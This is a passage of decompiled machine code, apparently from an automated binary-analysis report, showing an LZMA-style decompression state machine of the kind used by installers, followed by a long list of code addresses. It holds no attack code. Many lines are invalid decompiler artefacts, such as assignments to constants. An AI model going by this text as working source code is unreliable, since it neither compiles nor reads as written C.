							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                    0x00405f92
                                                                                    0x00405f99
                                                                                    0x00405f9f
                                                                                    0x00405fa5
                                                                                    0x00000000
                                                                                    0x00405fa9
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x00000000
                                                                                    0x00405fcb
                                                                                    0x00405fcf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fd8
                                                                                    0x00405fdb
                                                                                    0x00405fde
                                                                                    0x00405fe0
                                                                                    0x00405fe2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fe8
                                                                                    0x00405feb
                                                                                    0x00405fed
                                                                                    0x00405fee
                                                                                    0x00405ff1
                                                                                    0x00405ff3
                                                                                    0x00405ff4
                                                                                    0x00405ff6
                                                                                    0x00405ff9
                                                                                    0x00405ffe
                                                                                    0x00406003
                                                                                    0x0040600c
                                                                                    0x0040601f
                                                                                    0x00406022
                                                                                    0x0040602b
                                                                                    0x0040602e
                                                                                    0x00406056
                                                                                    0x00406056
                                                                                    0x00406058
                                                                                    0x00406066
                                                                                    0x00406066
                                                                                    0x0040606a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x0040605a
                                                                                    0x0040605d
                                                                                    0x0040605d
                                                                                    0x0040605e
                                                                                    0x0040605e
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x00406030
                                                                                    0x00406034
                                                                                    0x00406039
                                                                                    0x00406039
                                                                                    0x00406042
                                                                                    0x00406048
                                                                                    0x0040604a
                                                                                    0x0040604d
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406070
                                                                                    0x00406070
                                                                                    0x00406074
                                                                                    0x00406920
                                                                                    0x00000000
                                                                                    0x00406920
                                                                                    0x0040607d
                                                                                    0x0040608d
                                                                                    0x00406090
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406096
                                                                                    0x00406096
                                                                                    0x0040609a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040609c
                                                                                    0x0040609f
                                                                                    0x004060a2
                                                                                    0x004060cc
                                                                                    0x004060d2
                                                                                    0x004060d9
                                                                                    0x00000000
                                                                                    0x004060d9
                                                                                    0x004060a4
                                                                                    0x004060a8
                                                                                    0x004060ab
                                                                                    0x004060b0
                                                                                    0x004060b0
                                                                                    0x004060bb
                                                                                    0x004060c1
                                                                                    0x004060c3
                                                                                    0x004060c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040610b
                                                                                    0x00406111
                                                                                    0x00406114
                                                                                    0x00406121
                                                                                    0x00406129
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060e0
                                                                                    0x004060e0
                                                                                    0x004060e4
                                                                                    0x0040692f
                                                                                    0x00000000
                                                                                    0x0040692f
                                                                                    0x004060f0
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fe
                                                                                    0x00406101
                                                                                    0x00406104
                                                                                    0x00406107
                                                                                    0x00406109
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067af
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067e5
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067ee
                                                                                    0x004067ee
                                                                                    0x004067f2
                                                                                    0x004069a1
                                                                                    0x00000000
                                                                                    0x004069a1
                                                                                    0x004067fe
                                                                                    0x00406805
                                                                                    0x0040680d
                                                                                    0x0040680d
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00406813
                                                                                    0x00406813
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406131
                                                                                    0x00406133
                                                                                    0x00406136
                                                                                    0x004061a7
                                                                                    0x004061aa
                                                                                    0x004061ad
                                                                                    0x004061b4
                                                                                    0x004061be
                                                                                    0x00000000
                                                                                    0x004061be
                                                                                    0x00406138
                                                                                    0x0040613c
                                                                                    0x0040613f
                                                                                    0x00406141
                                                                                    0x00406144
                                                                                    0x00406147
                                                                                    0x00406149
                                                                                    0x0040614c
                                                                                    0x0040614e
                                                                                    0x00406153
                                                                                    0x00406156
                                                                                    0x00406159
                                                                                    0x0040615d
                                                                                    0x00406164
                                                                                    0x00406167
                                                                                    0x0040616e
                                                                                    0x00406172
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406181
                                                                                    0x0040619f
                                                                                    0x004061a1
                                                                                    0x00000000
                                                                                    0x004061a1
                                                                                    0x00406183
                                                                                    0x00406186
                                                                                    0x00406189
                                                                                    0x0040618c
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x00406191
                                                                                    0x00406194
                                                                                    0x00406196
                                                                                    0x00406197
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063d0
                                                                                    0x004063d4
                                                                                    0x004063f2
                                                                                    0x004063f5
                                                                                    0x004063fc
                                                                                    0x004063ff
                                                                                    0x00406402
                                                                                    0x00406405
                                                                                    0x00406408
                                                                                    0x0040640b
                                                                                    0x0040640d
                                                                                    0x00406414
                                                                                    0x00406415
                                                                                    0x00406417
                                                                                    0x0040641a
                                                                                    0x0040641d
                                                                                    0x00406420
                                                                                    0x00406420
                                                                                    0x00406425
                                                                                    0x00000000
                                                                                    0x00406425
                                                                                    0x004063d6
                                                                                    0x004063d9
                                                                                    0x004063dc
                                                                                    0x004063e6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406461
                                                                                    0x00406464
                                                                                    0x00406467
                                                                                    0x00406471
                                                                                    0x00406440
                                                                                    0x00406440
                                                                                    0x00406443
                                                                                    0x00406446
                                                                                    0x00406449
                                                                                    0x00406456
                                                                                    0x00406459
                                                                                    0x00406459
                                                                                    0x00000000
                                                                                    0x00000000
